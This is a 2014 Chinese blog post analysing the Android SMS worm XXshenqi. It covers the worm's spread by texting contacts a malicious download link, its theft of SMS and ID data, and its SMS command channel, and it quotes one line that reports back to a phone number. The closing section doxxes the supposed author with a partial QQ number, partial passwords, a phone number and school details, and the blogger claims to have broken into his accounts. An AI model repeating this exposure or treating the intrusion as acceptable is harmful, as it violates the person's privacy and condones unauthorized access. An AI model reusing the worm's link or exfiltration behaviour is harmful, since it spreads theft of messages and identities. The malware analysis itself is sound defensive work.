Android短信蠕虫XXshenqi分析

标签: Android 网络安全 android 蠕虫 | 发表时间:2014-08-04 17:15 | 作者:scsecrystal
出处:http://www.geekfan.net

0×00

今天从余弦大大微博上看到了这款Android短信蠕虫的信息,于是自己下载了一款研究,看到网上很多报告的md5值不同,不知道是否是变种。接下来就分析一下,这款病毒究竟做了些什么。

0×01

病毒分为两个部分,一个是XXshenqi.apk,另一个是com.android.Trogoogle.apk。后者存在于前者解压文件下的assets目录中。首先,分析XXshenqi.apk,安装至虚拟机上运行。

0.  首先,在初始安装后,用户点击app,会出现安装另外一个apk的信息:

1 2

 

  1. 入口Activity是WelcomeActivity,在这个Activity中,首先获取手机中所有的联系人信息,然后群发一条短信,内容如下:
[联系人姓名] + “看这个,” +”http://cdn.yyupload.com/down/4279193/XXshenqi.apk”

骗取本机联系人点击恶意链接下载病毒进行传播。

发送成功后,执行:

SmsManager.getDefault().sendTextMessage(“18670259904″, null, “XXshenqi 群发链接OK”, null, null);

即向这个号码反馈执行信息。

  1. 开启一个MainActivity

在这个Activity中,安装一个com.example.com.android.trogoogle的文件,这个文件存在于xxshenqi.apk解压后文件的assets目录下。

安装木马后,会自动隐藏图标。

同时弹出一个登录框,只不过这个是个幌子,怎么输入都会出现密码错误或者账户不存在,将用户导入到一个注册页面:RegisterActivity中

3.RegisterActivity真的是注册页面吗?

3 (1)

 

在这个页面中,会让用户输入很多信息,比如身份证号以及姓名。

4

 

如果点击了注册按钮那么很不幸,你的信息就会发送到黑客的手机上。

至此,xxshenqi.apk的任务基本是完成了,即使用户卸载也无所谓,因为木马已经在刚开始就被释放了。

0×02

5

 

1.在入口Activity—–MainActivity中木马执行了隐藏图标的功能,随后打开了一个ListenMessageService的服务,在后台运行。

2.ListenMessageService这个服务里面,首先注册一个短信数据库的观察者,检测短信数据库的变化,一旦用户的短信数据库发生变化(收到信息或者更新信息),那么观察者就会执行回调函数执行,首先判断是否是命令短信,命令短信是用来向木马发送命令的。如果是平常的短信,就将截获的短信全部发往黑客手中,值得注意的是木马还判断短信是否是淘宝发送的短信,如果是的话就单独处理。

并且木马中还有发送伪造短信给用户的功能,如果是这种短信,木马就不会截获或者发送给黑客。

这里还存在的恶意行为是读取用户收件发件箱短信,以及手机中的联系人。

当截获完短信之后,木马就又开启了一个MySendEmailService服务。

3.MySendEmailService这个服务就是给黑客发送电子邮件。

这上面都是一些用到的发送信息包括主机,端口,账户名,密码(有密码哦~)。。。

4.定义广播接收者处理接收的命令BroadcastRecvMessage

BroadcastRecvMessage这个类继承了系统的BroadcastReceiver组件,一旦接收到短信,就会触发代码,并判断指令所要求木马执行的具体功能。

readmessage 发送邮件命令

sendmessage发送短信命令

test测试命令

makemessage伪造短信命令

sendlink发送连接的命令

当然,这里也做了具体处理,就是判断是否是普通短信和淘宝网购信息,如果是淘宝信息就加上一个Flag发送,简直碉堡。

0×03

至此,这款病毒究竟做了些啥就基本清楚了,所做的操作也是一般短信木马的常有功能,包括截获短信并发送,发送恶意链接进行传播(冒充联系人发送,更有迷惑性),支持接收指令,以及发送恶意伪造的短信给用户(冒充联系人发送,更有迷惑性)等行为,还是比较歹毒的。

Android系统具有优美的开放性的同时,同样也遭受着各种病毒的侵袭。面对这些病毒,最好的办法还是不要去一些不正规的应用市场下载,并且注意安装时认清权限,如果有可以的权限如:读取系统日志,那么就不要轻易下载。

0×04

此篇分析是小编急着赶出来的,如果有错误的地方,还请指正,共同进步!

————————————以上内容来自91Ri团队小编:隐形人,以下内容为此款蠕虫作者简要资料——————————

该蠕虫作者为 中南大学的一名李同学编写,QQ号为:1377365** 在该蠕虫爆发前QQ密码为:lishuli** 目前身在湖南,电话号码为181636573**

曾用密码:entershi** shiftct**

在用密码:略

在初中时曾就读于深圳展华实验学校,根据小编收集到的信息这名编写蠕虫的作者Android技术并不算强,但竟然能弄的包括小编身边的一些小伙伴也中招,真是令人有点蛋疼。

小编虽然已经收集到了该作者详细身份信息,住址,照片,并且进入了获得了该名作者相关账户权限。但看在他还是一名90后,且能在今天这个七夕的的份上却调皮捣蛋,跟小编一样是一个…….(省略N个字),小编就不贴出更多信息。

本文重在对该蠕虫的具体分析,文章并不是非常的详细,不保证有错误,欢迎大家留言交流。祝有妹子的同学七夕快乐,没妹子的同学撸站快乐~(话说有妹子的同学能看到你这篇文章吗!!!)

Android短信蠕虫XXshenqi分析,首发于 极客范 - GeekFan.net

相关 [android 短信 蠕虫] 推荐:

Android短信蠕虫XXshenqi分析

- - 极客范 - GeekFan.net
今天从余弦大大微博上看到了这款Android短信蠕虫的信息,于是自己下载了一款研究,看到网上很多报告的md5值不同,不知道是否是变种. 接下来就分析一下,这款病毒究竟做了些什么. 病毒分为两个部分,一个是XXshenqi.apk,另一个是com.android.Trogoogle.apk. 后者存在于前者解压文件下的assets目录中.

Android 短信发送

- - CSDN博客推荐文章
在AndroidMainfest.xml中应加入:. . 作者:h7870181 发表于2012-11-7 22:13:25 原文链接. 阅读:5 评论:0 查看评论.

android 发短信、打电话、发邮件

- - ITeye博客
需要权限 android.permission.SEND_SMS. 使用android.telephony.SmsManager类. sendDataMessage()接受一个附加参数以指定一个端口号,还会接受一个字节数组(不是一个String 消息). sendMultipartTextMessage()支持在整条消息大于SMS规范所允许的大小时发送文本消息.

[Android]SMS Backup+ – 将短信同步备份到 Gmail | 小众软件 > Android

- Hexi - 小众软件
SMS Backup 是款 Android 手机上的备份短信应用,可将短信同步备份至 Gmail. 感谢 香灰堂 的推荐,SMS Backup+ 有中文界面. SMS Backup+ 能自动将手机的所有短信同步备份到 Gmail,(以邮件的格式,每个联系人一组对话)并建立一个标签,比如”SMS”,这个标签默认是存档(Archive)的,所以不会出现在收件箱,最大的优势在于可以搜索.

随机选择收件人——Android 短信门?

- nAODI - 爱范儿 · Beats of Bits
前两周可能很多人都在网上看到一个颇为搞笑的地下恋情曝光事件,无辜的记者和报社就这么莫名地被起诉了. 古人有云:若要人不知,除非己莫为. 这种狗血的事情不仅可能会因为记者随意扫街的镜头,也可能因为你拿在手里的 Android 手机. 根据 ZDNET 博客 Hardware 2.0 消息,Android  的文字短信息系统存在故障:在你发送短信时,它会将你的信息随机发送给错误的接收人.

免费短信和电话服务TextFree在Android上爆发

- licheng - 36氪
TextFree是由Pinger开发的一款手机应用,允许用户通过真实的手机号码免费收发手机短信,拨打免费电话. TextFree还推出了Android版客户端. Pinger CEO Greg Woock 称TextFree用户现在每月收发15亿条短信,拨打4500万分钟语音电话,目前已是全美十大运营商之一.

直接用 Chrome 扩展来回复 Android 手机上的短信

- Sinan - 谷奥——探寻谷歌的奥秘
标题已经说明一切了,没错,Android手机发短信怎么着也比用电脑键盘打字慢,尤其是没有实体键盘的纯触摸屏手机. 所以直接用电脑来回手机上的短信最方便了,尤其适合一上班或一回家就开电脑的挨踢人士. 下载DeskSMS for Android应用,并在自己的Android手机上安装. 下载DeskSMS for Chrome扩展,并在自己的Chrome浏览器上安装.

Android系统的阿基里斯之踵:伪造短信篇

- - FreeBuf.COM
‍‍ 导读:Android系统的日益强大,但Android平台的安全问题一直是其“阿基里斯之踵”. 据统计,2012 年有 79% 的恶意软件都寄生于 Andriod 之上,此数字比 2011 年更高出 12.3%. 相较之下,iOS 平台内的恶意软件仅占总量的 0.7%,继续成为最安全的移动系统.

伯克利学生开发“短信浏览器”Smozzy ,让Android 用户通过短信浏览互联网

- 锋 - 36氪
你有没有想过,手机没有开通数据套餐如何上网. Smozzy (下载地址)就是一个可以让没有数据套餐的用户通过手机浏览互联网的Android 应用. Smozzy 的界面很简单,只有一个地址栏/搜索栏以及一个WebView 用于呈现网页内容. 当用户在地址栏键入一个网址或者一个搜索关键词后,Smozzy 就会通过短信(SMS)或者彩信(MMS)发出请求到服务器,再由服务器请求相关网页后,按照短信或者彩信的格式发送到客户端.

直接用 Chrome 扩展来回复 Android 手机上的短信 | 谷奥——探寻谷歌的奥秘

- bluetent - www.guao.hk
标题已经说明一切了,没错,Android手机发短信怎么着也比用电脑键盘打字慢,尤其是没有实体键盘的纯触摸屏手机. 所以直接用电脑来回手机上的短信最方便了,尤其适合一上班或一回家就开电脑的挨踢人士. 下载DeskSMS for Android应用,并在自己的Android手机上安装. 下载DeskSMS for Chrome扩展,并在自己的Chrome浏览器上安装.